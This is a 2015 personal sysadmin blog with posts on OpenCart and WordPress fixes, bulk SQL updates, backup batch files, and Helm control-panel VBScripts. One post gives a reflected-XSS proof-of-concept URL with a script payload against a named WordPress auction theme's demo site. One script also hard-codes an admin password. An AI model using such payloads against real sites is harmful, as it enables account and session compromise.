Saturday, 12 December 2015

Rejoin hjsplit files on Mac OSX, linux and bsd

Open the terminal and run the cat command, listing the parts in order:

cat yourfile.extension.001 yourfile.extension.002 yourfile.extension.00X > yourfile.extension
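An added example (not part of the original post): a POSIX shell function that does the same join but first checks that no numbered part is missing, then verifies the size of the result. The names `rejoin_parts` and `demo_rejoin` and the sample file names are made up for illustration, and the sample parts are constructed.

```shell
#!/bin/sh
# rejoin_parts BASE [OUT]
# Joins BASE.001, BASE.002, ... into OUT (default: BASE) in numeric order.
rejoin_parts() {
    rp_base=$1
    rp_out=${2:-$1}

    if [ -e "$rp_out" ]; then
        echo "refusing to overwrite existing file: $rp_out" >&2
        return 1
    fi

    # Count the contiguous run BASE.001, BASE.002, ... that is present.
    rp_n=0
    while [ -f "$(printf '%s.%03d' "$rp_base" $((rp_n + 1)))" ]; do
        rp_n=$((rp_n + 1))
    done
    if [ "$rp_n" -eq 0 ]; then
        echo "first part not found: $rp_base.001" >&2
        return 1
    fi

    # Every three-digit part on disk must belong to that run; otherwise a
    # piece is missing and a plain cat would silently skip it.
    rp_total=0
    for rp_f in "$rp_base".[0-9][0-9][0-9]; do
        if [ -f "$rp_f" ]; then
            rp_total=$((rp_total + 1))
        fi
    done
    if [ "$rp_total" -ne "$rp_n" ]; then
        echo "missing or unexpected part: $rp_n in sequence, $rp_total on disk" >&2
        return 1
    fi

    # Concatenate in numeric order into a temporary name, adding up sizes.
    rp_tmp="$rp_out.partial"
    : > "$rp_tmp" || return 1
    rp_expected=0
    rp_i=1
    while [ "$rp_i" -le "$rp_n" ]; do
        rp_part=$(printf '%s.%03d' "$rp_base" "$rp_i")
        cat "$rp_part" >> "$rp_tmp" || { rm -f "$rp_tmp"; return 1; }
        rp_expected=$(( rp_expected + $(wc -c < "$rp_part") ))
        rp_i=$((rp_i + 1))
    done

    # Only publish the result if its size equals the sum of the parts.
    rp_actual=$(( $(wc -c < "$rp_tmp") + 0 ))
    if [ "$rp_actual" -ne "$rp_expected" ]; then
        echo "size mismatch: got $rp_actual bytes, expected $rp_expected" >&2
        rm -f "$rp_tmp"
        return 1
    fi
    mv "$rp_tmp" "$rp_out"
}

# Constructed sample: three small parts in a temporary directory.
demo_rejoin() {
    demo_dir=$(mktemp -d) || return 1
    printf 'AAAA' > "$demo_dir/video.avi.001"
    printf 'BBBB' > "$demo_dir/video.avi.002"
    printf 'CC' > "$demo_dir/video.avi.003"
    if rejoin_parts "$demo_dir/video.avi"; then
        cat "$demo_dir/video.avi"
        echo
        demo_rc=0
    else
        demo_rc=1
    fi
    rm -rf "$demo_dir"
    return "$demo_rc"
}

demo_rejoin
```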

Friday, 4 December 2015

[FIX] OPENCART - Call to a member function getFirstName() on a non-object

The error

Call to a member function getFirstName() on a non-object

can appear if there is something wrong in your admin configuration file.

A sample configuration file for the admin area follows:

<?php
// HTTP
define('HTTP_SERVER', 'http://www.example.it/admin/');
define('HTTP_CATALOG', 'http://www.example.it/');

// HTTPS
define('HTTPS_SERVER', 'http://www.example.it/admin/');
define('HTTPS_CATALOG', 'http://www.example.it/');

// DIR
define('DIR_APPLICATION', '/var/www/vhosts/example.it/httpdocs/admin/');
define('DIR_SYSTEM', '/var/www/vhosts/example.it/httpdocs/system/');
define('DIR_LANGUAGE', '/var/www/vhosts/example.it/httpdocs/admin/language/');
define('DIR_TEMPLATE', '/var/www/vhosts/example.it/httpdocs/admin/view/template/');
define('DIR_CONFIG', '/var/www/vhosts/example.it/httpdocs/system/config/');
define('DIR_IMAGE', '/var/www/vhosts/example.it/httpdocs/image/');
define('DIR_CACHE', '/var/www/vhosts/example.it/httpdocs/system/cache/');
define('DIR_DOWNLOAD', '/var/www/vhosts/example.it/httpdocs/system/download/');
define('DIR_UPLOAD', '/var/www/vhosts/example.it/httpdocs/system/upload/');
define('DIR_LOGS', '/var/www/vhosts/example.it/httpdocs/system/logs/');
define('DIR_MODIFICATION', '/var/www/vhosts/example.it/httpdocs/system/modification/');
define('DIR_CATALOG', '/var/www/vhosts/example.it/httpdocs/catalog/');

// DB
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'usert');
define('DB_PASSWORD', 'password');
define('DB_DATABASE', 'db_example');
define('DB_PREFIX', 'oc_');

Thursday, 26 November 2015

FIX - Wordpress Title not showing up in the home page.


If WordPress wp_title() returns empty/blank content on the index page, you can try modifying your theme to use the following code for the title:



    <title><?php is_front_page() ? bloginfo('name') : wp_title(''); ?></title>

It will use the blog name as title for the front page.


Tuesday, 24 November 2015

How to disable mouse right click. Disable image drag and save. Jquery

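jQuery snippet to disable the right-click menu and drag-to-save on images. It only discourages casual copying: the images are still delivered to the browser and can be saved from the page source, the developer tools, or with scripts disabled.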

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0-alpha1/jquery.min.js" type="text/javascript"></script>

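<script type="text/javascript">
$(document).ready(function () {
    // Block the context menu (right click) on images
    $('img').on('contextmenu', function (e) { return false; });
    // Block dragging images out of the page
    $('img').on('dragstart', function (e) { return false; });
});
</script>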




FIX Opencart - Warning: vsprintf(): Too few arguments in /admin/controller/dashboard/activity.php on line 19


Warning: vsprintf(): Too few arguments in /admin/controller/dashboard/activity.php on line 19


Back up before doing anything!

The problem is probably caused by missing values in the customer activity data, or by the table itself missing after an upgrade.

You can look in the table and find the problem in a serialized value (the format used before 2.1.0.1), or convert the values to a JSON-readable format (this happens when upgrading to 2.1.0.1).
If you don't care about the activity data (it's not a big issue) you can truncate the table and accept all the new data.

TRUNCATE TABLE `oc_customer_activity`;

In the worst case you can recreate the customer_activity table:
DROP TABLE IF EXISTS `oc_customer_activity`;
CREATE TABLE `oc_customer_activity` (
`activity_id` int(11) NOT NULL AUTO_INCREMENT,
`customer_id` int(11) NOT NULL,
`key` varchar(64) NOT NULL,
`data` text NOT NULL,
`ip` varchar(40) NOT NULL,
`date_added` datetime NOT NULL,
PRIMARY KEY (`activity_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;



Friday, 13 November 2015

wordpress sitemile auctiontheme - XSS


The XSS can be used almost anywhere

onlinedemo.sitemile.com/auction/advanced-search/?auction_ID=&term=aaa&price_min=&price_max=&zip_code=&radius=&auction_location_cat=&auction_cat_cat=&ref-search

example:
http://onlinedemo.sitemile.com/auction/advanced-search/?auction_ID=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


Wednesday, 11 November 2015

Windows 10 - Start button is not working, windows photo image viewer is crashing, cannot close applications from the taskbar.



I really don't know what happened but I got several problems with a fresh installation of windows 10:

  • Start button not working
  • windows photo image viewer crashing
  • cannot close applications from the taskbar
  • SFC /scannow - not working
  • ... and so on

Use Explorer (or the Task Manager, or Win+R) to run cmd.exe as administrator from %windir%\system32 and then run "powershell.exe"; otherwise run %windir%\winsxs\powershell.exe directly (as administrator).

Paste the following command into PowerShell and wait:





Get-AppXPackage -AllUsers | Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}


I suppose that it should re-register the installed Apps from the xml manifests.








references:
http://www.thewindowsclub.com/start-menu-does-not-open-windows-10
https://technet.microsoft.com/en-us/library/hh856044.aspx?f=255&MSPPError=-2147217396
 


Wednesday, 4 November 2015

tp-link tl-wn723n - ic 8853a USB\VID_0BDA&PID_8179 Driver Download


All the drivers that I've downloaded/tested from the official pages seem to not work.
After searching a little bit I've found that this driver, from medion, works without problem.
http://download.medion.com/downloads/treiber/wlan_e421xw8x.exe

Saturday, 31 October 2015

Bazaar for windows portable - win32 bzr.exe


If you need a fast way to use Bazaar on Windows to download Launchpad repositories, without losing too much time, you can download from here a version that should work on 32-bit and 64-bit versions of Windows.


bazaar for windows 10.
bazaar for windows 8.
bazaar for windows 7.
bazaar for windows xp.

You can download here bazaar portable for Windows

Sunday, 4 October 2015

Drivers dell inspiron 1545 Intel 1545 Video Card



PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028&REV_07
PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028
PCI\VEN_8086&DEV_2A42&CC_030000
PCI\VEN_8086&DEV_2A42&CC_0300

After several crashes and problems I've found a decent driver that works on windows 7 and 8


thanks to the eightforums
http://www.eightforums.com/graphic-cards/4418-mobile-intel-series-4-intel-hd-graphics-1st-generation.html

you can download 64 and 32 bit versions that are working for sure on  this specific model!
64bit Win7Vista8_64_151719_v2.exe
32bit Win7Vista8_151719_v2.exe

Mirrors:

64 bit - http://multiupload.biz/1eh0sfmlik56/Win7Vista8_64_151719_v2_MultiUpload.biz.exe.html
rapidgator.net    http://multiupload.biz/ra_1eh0sfmlik56
sendmyway.com    http://multiupload.biz/sw_1eh0sfmlik56
solidfiles.com    http://multiupload.biz/se_1eh0sfmlik56
speedyshare.com    http://multiupload.biz/s2_1eh0sfmlik56

http://multiupload.biz/k4k56wixcyb6/Win7Vista8_151719_v2.exe.html
rapidgator.net    http://multiupload.biz/ra_k4k56wixcyb6
sendmyway.com    http://multiupload.biz/sw_k4k56wixcyb6
solidfiles.com    http://multiupload.biz/se_k4k56wixcyb6
speedyshare.com    http://multiupload.biz/s2_k4k56wixcyb6

Thursday, 1 October 2015

Opencart - moving all the products from a category (id) to another category (id)

Moving all the products from the category with id 3 to the category with id 1:

UPDATE oc_product_to_category set category_id = '1' where category_id = '3';

Wednesday, 30 September 2015

Opencart - SQL to Delete customers of a specific Users Group and move all the customers to the 1st users group


In this example we delete all the customers of the group with ID 3 and move all the other customers to the first group



-- Remove the dependent rows of every customer in group 3 first.
-- (The comparison is "= 3" so that the statements delete group 3,
-- as described above.)
DELETE FROM oc_customer_activity WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

DELETE FROM oc_customer_history WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

DELETE FROM oc_customer_ip WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

DELETE FROM oc_customer_online WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

DELETE FROM oc_customer_reward WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

DELETE FROM oc_customer_transaction WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

DELETE FROM oc_address WHERE customer_id IN (
 SELECT oc_customer.customer_id FROM `oc_customer` WHERE customer_group_id = 3
);

-- Then remove the customers themselves.
DELETE FROM oc_customer WHERE customer_group_id = 3;

/* move all the remaining customers to customer_group_id 1 */
UPDATE `oc_customer` SET `customer_group_id` = '1';

Opencart - mass update price by percentage, change class id and so on. Simple Sql queries

Opencart disable products with price zero


Sometimes there are products with price zero, or other specific column/value, that need to be disabled.


It's quite easy to update all your products with this sql UPDATE.


    update oc_product set status = 0 where price = 0.0000;


Mass Update the prices of the products in opencart


Lowering the price by removing a 22% tax (dividing by 1.22) - for example when you've imported prices including taxes and you want to add a tax class

    update oc_product set price = (price / 1.22);


Raising the price by 22% (e.g. Italian VAT)

    update oc_product set price = (price * 1.22);



Mass Update the tax class of the products in opencart


    update oc_product set tax_class_id = 1;

If you want to remove the class id from all the products:

    update oc_product set tax_class_id = 0;


Opencart cannot login in frontend and backend. No error message

Problem:
You cannot log in to the Opencart frontend or backend.
No error messages appear when you log in with the correct credentials.

Solution:
Clear the VQMOD cache (if installed) in vqmod/vqcache/
Fix the permissions on the vqmod folder (it must be writable).

Tuesday, 29 September 2015

opencart - sql to update all the images with the model name



UPDATE oc_product SET oc_product.image = CONCAT('image/catalog/yourfolder/', LCASE(TRIM(oc_product.model)), '.jpg');


Change the folder accordingly and remember to use lower-case characters for your file names; otherwise remove LCASE.

Monday, 28 September 2015

mysql dump and save batch

mysql dump and save with a batch file. It's quite old but works.





SET bkdir=d:\manualbackup\data
SET SAVEDATA="%bkdir%\mysql.7z"
SET mysqldir=c:\mysql\bin
SET mysqluser=root
SET mysqlpassword=pass

REM 7-zip executable path
SET SEVENPATH="%PROGRAMFILES%\7-Zip\7z.exe"

REM zipped file to save data

SET ADDUP=a
IF EXIST %SAVEDATA% SET ADDUP=u

@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
"%mysqldir%\mysqldump.exe" -u %mysqluser% -p%mysqlpassword% --opt --all-databases >"%bkdir%\backup.sql"



%SEVENPATH% %ADDUP% -ms=off -pfuxedboost -t7z  %SAVEDATA% "%bkdir%\backup.sql"

del "%bkdir%\backup.sql"

IIS Log cleaner (old) method to clean all the IIS logs







'Determine the number of days for which you want to keep logs
logDelDays = 30

'Main driver
purgeIISLogs("W3SVC")
purgeIISLogs("MSFTPSVC")

'Purge IIS logs
Sub purgeIISlogs(strService)
    Set fso    = CreateObject("Scripting.FileSystemObject")
    Set objIIS = GetObject("IIS://" & getComputer() & "/" & strService)
    For Each objweb in objIIS
        If lCase(objweb.Class) = "iiswebserver" _
        Or lCase(objweb.Class) = "iisftpserver" Then
            fLogDirPath = objweb.LogFileDirectory & "\" & strService & objweb.name
            If fso.FolderExists(fLogDirPath) Then
                'Count deletions per site so the message below is accurate
                delCount = 0
                For Each fLog in fso.GetFolder(fLogDirPath).Files
                    If UCase(Left(fLog.Name,2)) = "EX" And UCase(Right(fLog.Name,4)) = ".LOG" Then
                        'File names look like exYYMMDD.log
                        fileDate = cDate(Mid(fLog.name,7,2) & " " & monthname(cint(Mid(fLog.name,5,2)),true) & " " & Mid(fLog.name,3,2))
                        'DateAdd takes (interval, number, date)
                        If fileDate < DateAdd("d", -logDelDays, Now()) Then
                            delCount = delCount + 1
                            fLog.Delete
                        End If
                    End If
                Next
                Wscript.Echo "Purged " & delCount & " logs for " & objweb.ServerComment
            End If
        End If
    Next
    Set objIIS = nothing
    Set fso    = nothing
End Sub

'Get computer name
Function getComputer()
    Set objNet = WScript.CreateObject("WScript.Network")
    getComputer= objNet.ComputerName
    Set objNet = Nothing
End Function

Simple script to backup the helm db.

Simple script to backup the helm db. It's quite old and I used it a long time ago.





@echo off


SET bkdir=d:\manualbackup\data
SET SAVEDATA="%bkdir%\helmdb.7z"
SET mysqldir=c:\mysql\bin
SET mysqlpassword=pass
REM 7-zip executable path
SET SEVENPATH="%PROGRAMFILES%\7-Zip\7z.exe"
SET zippass=pass

REM zipped file to save data

SET ADDUP=a
IF EXIST %SAVEDATA% SET ADDUP=u

@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
REM "%mysqldir%\mysqldump.exe" -u %mysqluser% -p%mysqlpassword% --opt --all-databases >"%bkdir%\backup.sql"

osql -E -S .\Helm -Q "BACKUP DATABASE helmdb TO DISK='%bkdir%\helmdb2.dat'"






if exist %bkdir%\helmdb2.dat goto exist
goto end
:exist
ren "%bkdir%\helmdb2.dat" helmdb.dat
%SEVENPATH% %ADDUP% -ms=off -p%zippass% -t7z  %SAVEDATA% "%bkdir%\helmdb.dat"
del "%bkdir%\helmdb.dat" "%bkdir%\helmdb2.dat"


:end

Command line to scan with ClamAV / ClamWin and save the output to a log file


C:\clamav-devel\bin\clamscan --recursive --infected --stdout --log=log.wri c:\

How to restore permissions in the web folders - script restore permissions webfolders.vbs (old)








'-------------------------------------------------------------
' Domains Folders Permissions Rebuild Script
' ============================================================
' Re-adds the permissions for the IIS anonymous users to the
' domains folders
' ------------------------------------------------------------
' Copyright © 2004 Andrew Taylor
' ------------------------------------------------------------
' Usage: Save this script as a .vbs file and run:
'        cscript.exe "c:\PermissionsRebuild.vbs"
' ------------------------------------------------------------
' Enquiries to andy@4dhosting.com
' I disclaim all responsibility for results of this script
' which is run at your own risk
'-------------------------------------------------------------

'-------------------------------------------------------------
' Configuration variables
'-------------------------------------------------------------

Const strDBServer = "localhost"
Const strDBName = "HelmDb"
Const strDBUser = "sa"
Const strDBPassword = "password"

Const strDomains = "c:\domains\"

Const strLogFile = "c:\PermissionsRebuild.log"

Const strAppPath = "c:\SetACL\SetACL.exe"

'-------------------------------------------------------------
' Do not edit below here
'-------------------------------------------------------------

ERR_NTFS_USER_LOOK_UP_FAILED = 1
ERR_NTFS_CANT_SET_SECURITY_DESCRIPTOR = 2
ERR_CMD_EXECUTION_FAILED = 3

GENERIC_DELETE = &H10000
ADS_RIGHT_READ_CONTROL = &H20000
ADS_RIGHT_WRITE_DAC = &H40000
ADS_RIGHT_WRITE_OWNER = &H80000
ADS_RIGHT_SYNCHRONIZE = &H100000
ADS_RIGHT_ACCESS_SYSTEM_SECURITY = &H1000000
GENERIC_READ = &H80000000
GENERIC_WRITE = &H40000000
GENERIC_EXECUTE = &H20000000
GENERIC_ALL = &H10000000
ADS_RIGHT_DS_CREATE_CHILD = &H1
ADS_RIGHT_DS_DELETE_CHILD = &H2
ADS_RIGHT_ACTRL_DS_LIST = &H4
ADS_RIGHT_DS_SELF = &H8
ADS_RIGHT_DS_READ_PROP = &H10
ADS_RIGHT_DS_WRITE_PROP = &H20
ADS_RIGHT_DS_DELETE_TREE = &H40
ADS_RIGHT_DS_LIST_OBJECT = &H80
ADS_RIGHT_DS_CONTROL_ACCESS = &H100

COMMON_ADD = &H1201B6
COMMON_ADD_READ = &H1201BF
COMMON_READ = &H1200A9
COMMON_CHANGE = &H1301BF
COMMON_FULL_CONTROL = GENERIC_ALL
COMMON_ALL = &H1F01FF

NO_INHERITANCE = &H0
ALL_INHERIT_ACE = &H3

OBJECT_INHERIT_ACE = &H1
CONTAINER_INHERIT_ACE = &H2
NO_PROPAGATE_INHERIT_ACE = &H4
INHERIT_ONLY_ACE = &H8
INHERITED_ACE = &H10
VALID_INHERIT_FLAGS = &H1F

SET_ACCESS = 1
SET_DENY = 0

' setup connection to the database
Set db = CreateObject("ADODB.Connection")
strConn = "Provider=SQLOLEDB;Server=" & strDBServer & ";Database=" & strDBName & ";user ID=" & strDBUser & ";password=" & strDBPassword & ";"
db.Open strConn

' setup log file
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set oFile = oFSO.CreateTextFile(strLogFile, true)

Set oFolder = oFSO.GetFolder(strDomains)

' go through each object in IIS
For Each oSubFolder in oFolder.SubFolders

   ' get domain and current anon user details
   strDomain = oSubFolder.Name

   ' log these details
   LogEvent "[+] Web Site: " & strDomain

   strNewUsername = GetAnonUser(strDomain)
   strNewPassword = GetAnonPassword(strDomain)

   ' if both username and password are present
   If strNewUsername <> "" And strNewPassword <> "" Then

      ' log the username only: the password is a live credential and
      ' must not be written to the screen or to the log file
      LogEvent "  [-] Username: " & strNewUsername

      ' if the anon user does not exist, create it
      If Not DoesUserExist(strNewUsername) Then
         LogEvent "  [-] Creating user"
         CreateUser strNewUsername, strNewPassword
      Else
         LogEvent "  [-] Resetting user password"
         SetPassword strNewUsername, strNewPassword
      End If

      LogEvent "  [-] Setting anonymous user details"
     
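      ' strServerName was never assigned; the accounts are created on this
      ' machine, so use the computer name as the trustee domain
      strResult = SetFolderPermissions(SET_ACCESS, GetComputer(), strNewUsername, oSubFolder.Path, COMMON_CHANGE, ALL_INHERIT_ACE)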
  
      If strResult <> "" Then

         ' log error
         LogEvent "  [!] Error updating permissions"

      Else

         ' log completion
         LogEvent "  [=] Details updated"

      End If

   Else

      LogEvent "  [=] Non-Helm site"

   End If

Next


' clear objects
Set oFolder = Nothing
Set rsDomains = Nothing

' close database
db.Close
Set db = Nothing

' get computer name
Function GetComputer()

   Set objNet = WScript.CreateObject("WScript.Network")
   GetComputer = objNet.ComputerName
   Set objNet = Nothing

End Function

' create new user with correct parameters
' (a Function rather than a Sub, because it returns True/False)
Function CreateUser(strUserName, strPassword)

   strGroupName = "HELMWEBUSERS"

   On Error Resume Next

   Set oDomain = GetObject("WinNT://" & GetComputer())
   Set oUser = oDomain.Create("user", strUserName)
   oUser.SetPassword strPassword
   oUser.FullName = strUserName
   oUser.SetInfo

   strFlags = oUser.Get("UserFlags")

   ' &H40 = user cannot change password, &H10000 = password never expires;
   ' set both in one Put so the second flag does not overwrite the first
   oUser.Put "UserFlags", strFlags Or &H00040 Or &H10000

   oUser.SetInfo

   Set oGroup = oDomain.GetObject("Group", strGroupName)
   oGroup.Add "WinNT://" & GetComputer() & "/" & strUserName
   Set oGroup=Nothing

   If Err.Number = 0 Then
      CreateUser = True
   Else
      CreateUser = False
   End If

   Set oUser = Nothing
   Set oDomain = Nothing

   Err.Clear

End Function

' determine if the user already exists
Function DoesUserExist(strUserName)

   On Error Resume Next

   Set oUser = GetObject("WinNT://" & GetComputer() & "/" & strUserName)

   If Err.Number = 0 Then
      DoesUserExist = True
   Else
      DoesUserExist = False
   End If

   Err.Clear

End Function

' resets the user's password
Function SetPassword(strUserName, strPassword)

   ' without this, a failure stops the script before Err.Number is checked
   On Error Resume Next

   Set oUser = GetObject("WinNT://" & GetComputer() & "/" & strUserName)
   oUser.SetPassword strPassword
   oUser.SetInfo

   If Err.Number = 0 Then
      SetPassword = True
   Else
      SetPassword = False
   End If

   Err.Clear

End Function

' log events to screen and file
Sub LogEvent(strLog)

   oFile.WriteLine strLog
   WScript.Echo strLog

End Sub

' gets the domains anon username
Function GetAnonUser(strDomain)

   intDomainId = GetDomainId(strDomain)

   Set rsUsername = CreateObject("ADODB.Recordset")
   strSQL = "SELECT HostDomainProperty.PropertyValue FROM HostDomainProperty INNER JOIN HostDomain ON HostDomain.DomainId = HostDomainProperty.DomainId WHERE HostDomainProperty.PropertyName = 'AnonUser' AND HostDomain.DomainId=" & intDomainId & ";"
   rsUsername.Open strSQL, db

   If Not rsUsername.EOF Then
      GetAnonUser = rsUsername("PropertyValue")
   Else
      GetAnonUser = ""
   End If

   rsUsername.Close
   Set rsUsername = Nothing

End Function

' gets the domains anon password
Function GetAnonPassword(strDomain)

   intDomainId = GetDomainId(strDomain)

   Set rsPassword = CreateObject("ADODB.Recordset")
   strSQL = "SELECT HostDomainProperty.PropertyValue FROM HostDomainProperty INNER JOIN HostDomain ON HostDomain.DomainId = HostDomainProperty.DomainId WHERE HostDomainProperty.PropertyName = 'AnonPassword' AND HostDomain.DomainId=" & intDomainId & ";"
   rsPassword.Open strSQL, db

   If Not rsPassword.EOF Then
      GetAnonPassword = rsPassword("PropertyValue")
   Else
      GetAnonPassword = ""
   End If

   rsPassword.Close
   Set rsPassword = Nothing

End Function

' gets the domain ID from the name
Function GetDomainId(strDomain)

   Set rsDomain = CreateObject("ADODB.Recordset")
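   ' strDomain comes from a folder name: double any single quote so it
   ' cannot break out of the SQL string literal
   strSQL = "SELECT * FROM HostDomain WHERE DomainName='" & Replace(strDomain, "'", "''") & "';"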
   'LogEvent strSQL
   rsDomain.Open strSQL, db

   If Not rsDomain.EOF Then
      intDomainId = CLng(rsDomain("DomainId"))
   Else

      intPtr = InStr(strDomain, ".")

      If intPtr > 0 Then
         strDomain = Mid(strDomain, intPtr + 1)
         intDomainId = GetDomainId(strDomain)
      Else
         intDomainId = 0
      End If

   End If

   rsDomain.Close
   Set rsDomain = Nothing

   GetDomainId = intDomainId

End Function

Function SetFolderPermissions(strAccessType, strTrusteeDomain, strTrusteeUsername, strFileName, strFileMask, strFileInheritance)
  
    On Error Resume Next
  
    Dim strCMD
    Dim cmdErrorCode
  
    If Right(strFileName, 1) = "\" Then strFileName = Left(strFileName, Len(strFileName) - 1)
  
    strCMD = """" & strAppPath & """ -on """ & strFileName & """ -ot file -actn ace -ace """
  
    strCMD = strCMD & "n:" & strTrusteeDomain & "\" & strTrusteeUsername
  
    Select Case strFileMask
        Case COMMON_ADD, COMMON_ADD_READ
            strCMD = strCMD & ";p:add_file"
        Case COMMON_READ, GENERIC_READ
            strCMD = strCMD & ";p:read"
        Case COMMON_CHANGE
            strCMD = strCMD & ";p:change"
        Case COMMON_FULL_CONTROL, COMMON_ALL, GENERIC_ALL
            strCMD = strCMD & ";p:full"
        Case GENERIC_DELETE
            strCMD = strCMD & ";p:delete"
        Case ADS_RIGHT_READ_CONTROL
            strCMD = strCMD & ";p:read_dacl"
        Case ADS_RIGHT_WRITE_DAC
            strCMD = strCMD & ";p:write_dacl"
        Case ADS_RIGHT_WRITE_OWNER
            strCMD = strCMD & ";p:write_owner"
        Case GENERIC_WRITE
            strCMD = strCMD & ";p:write"
        Case GENERIC_EXECUTE
            strCMD = strCMD & ";p:read_ex"
        Case Else
            strCMD = strCMD & ";p:change"
    End Select
  
    Select Case strFileInheritance
        Case NO_INHERITANCE
            strCMD = strCMD & ";i:np"
        Case ALL_INHERIT_ACE
            strCMD = strCMD
        Case OBJECT_INHERIT_ACE
            strCMD = strCMD & ";i:so"
        Case CONTAINER_INHERIT_ACE
            strCMD = strCMD & ";i:sc"
        Case NO_PROPAGATE_INHERIT_ACE
            strCMD = strCMD & ";i:np"
        Case INHERIT_ONLY_ACE
            strCMD = strCMD & ";i:io"
        Case INHERITED_ACE
            strCMD = strCMD & ";i:io"
    End Select
  
    Select Case strAccessType
        Case SET_ACCESS
            strCMD = strCMD & ";m:set"
        Case SET_DENY
            strCMD = strCMD & ";m:deny"
    End Select
  
    strCMD = strCMD & ";w:dacl"" -silent"

    cmdErrorCode = ExecCmd(strCMD)

    If cmdErrorCode <> 0 Then Err.Raise ERR_NTFS_USER_LOOK_UP_FAILED
    If Len(cmdOutput) > 0 Then Err.Raise ERR_NTFS_CANT_SET_SECURITY_DESCRIPTOR

   If Err.Number <> 0 Then

      Select Case Err.Number
         Case ERR_NTFS_USER_LOOK_UP_FAILED
            SetFolderPermissions = "Could not set permissions for " & strTrusteeUsername
         Case ERR_NTFS_CANT_SET_SECURITY_DESCRIPTOR
            SetFolderPermissions = "Could not set permissions on " & strFileName
      End Select

      Err.Clear

   End If

End Function

Function ExecCmd(strCMD)

   On Error Resume Next

   Set objWshShell = WScript.CreateObject("WScript.Shell")
   Set objFSO = CreateObject("Scripting.FileSystemObject")

   strTempFile = objFSO.GetTempName
   strPath = objFSO.GetSpecialFolder(TemporaryFolder)
   strTempFile = strPath & "\" & strTempFile

   ExecCmd = objWshShell.Run(strCMD, 0, True)
  
   cmdOutput = objFSO.OpenTextFile(strTempFile).ReadAll
   objFSO.DeleteFile strTempFile

   Err.Clear

End Function

Batch file to easily optimize the mysql database



SET mysqldir=c:\mysql\bin
SET mysqluser=root
SET mysqlpassword=mypass


@REM Change to mysqldir
CD %mysqldir%

@REM check, repair and optimize all databases. This is all one line
"%mysqldir%\mysqlcheck" -u %mysqluser% -p%mysqlpassword% --repair --analyze --optimize --all-databases --auto-repair

old vb script to restore dns on windows server - Do not use on new windows servers



 restoredns.vbs





'-------------------------------------------------------------
' Global DNS Rebuild Script
' ~~~~~~~~~~~~~~~~~~~~~~~~~
' Rebuilds your entire DNS structure for all domains in Helm.
' Useful for when moving servers, changing IPs, or for fixing
' messed up DNS records.
'
' It would be best to delete your DNS zones on your DNS server
' before running, to ensure new DNS zones are brand new!
'
' This script works with multi-server setups, run it on the
' control server!
'
' If you are using the script to change servers, or update IPs
' update all your system settings in the Helm Control Panel,
' then run this script.
'
' This also rebuilds global records that ADMIN and RESELLERS
' have added. It gets the entries the domain's reseller has
' added, then gets the entries the ADMIN has added.
'
' UPDATED 10/11/2004: Now works with TXT records and dynamic
'                     [DomainName] variables.
' ------------------------------------------------------------
' © Copyright 2004 Warren Ashcroft (HelmPlus)
' All Rights Reserved
' This script must not be distributed without permission
' ------------------------------------------------------------
' Usage: Save this script as a VBS file and run like this:
'        cscript.exe "c:\path\to\file.vbs"
' ------------------------------------------------------------
' For support email support@helmPlus
' Results of this are not my responsibility
'-------------------------------------------------------------

'-------------------------------------------------------------
' Configuration variables
'-------------------------------------------------------------
' Your ADMIN password for Helm
Dim AdminPass
AdminPass = "RR35RUJR"


'-------------------------------------------------------------
' DO NOT edit below here
'-------------------------------------------------------------
Dim oDomain, oDNS, oFTP, oEmail, oWebsite, oDomainAlias, oGlobalDNSRecord, oService, oServiceSet
Dim rsDomain, rsDomainAlias, rsGlobalDNS, rsGlobalDNSAdmin, rsDNS, rsService, rsServiceSet
Dim iCount, DomainID, DomainName, ResellerAccountNumber, ActionResult
Dim DNSRecordID, DomainAliasID, AliasName

Const DNS_A = 3      ' DNS_A
Const DNS_MX = 4     ' DNS_MX
Const DNS_CNAME = 5  ' DNS_CNAME
Const DNS_TXT = 6    ' DNS_TXT

Set oDomain = CreateObject("HELM.CDomain")
Set oDNS = CreateObject("HELM.CDNS")
Set oFTP = CreateObject("HELM.CFTP")
Set oEmail = CreateObject("HELM.CEmail")
Set oWebsite = CreateObject("HELM.CWebsite")
Set oService = CreateObject("HELM.CService")
Set oServiceSet = CreateObject("HELM.CServiceSet")
Set oDomainAlias = CreateObject("HELM.CDomainAlias")
Set oGlobalDNSRecord = CreateObject("HELM.CGlobalDNSRecord")

On Error Resume Next

WScript.Echo "Global DNS Rebuild Script"
WScript.Echo "© Copyright 2004 Warren Ashcroft (HelmPlus)"
WScript.Echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
WScript.Echo ""

Set rsDomain = oDomain.SearchEx()

If Not rsDomain.EOF Then rsDomain.MoveFirst
Do While Not rsDomain.EOF
   ' Set some standard data variables
   iCount = iCount + 1
   DomainID = rsDomain("DomainID")
   DomainName = rsDomain("DomainName")
   ResellerAccountNumber = rsDomain("ResellerAccountNumber")

   ' Setup the various recordsets
   Set rsGlobalDNS = oGlobalDNSRecord.SearchEx(, ResellerAccountNumber)
   Set rsGlobalDNSAdmin = oGlobalDNSRecord.SearchEx(, "ADMIN")
   Set rsDomainAlias = oDomainAlias.SearchEx(, DomainID)
   Set rsDNS = oDNS.SearchEx(, DomainID)
   Set rsServiceSet = oServiceSet.SearchEx(, , DomainID, , "2")
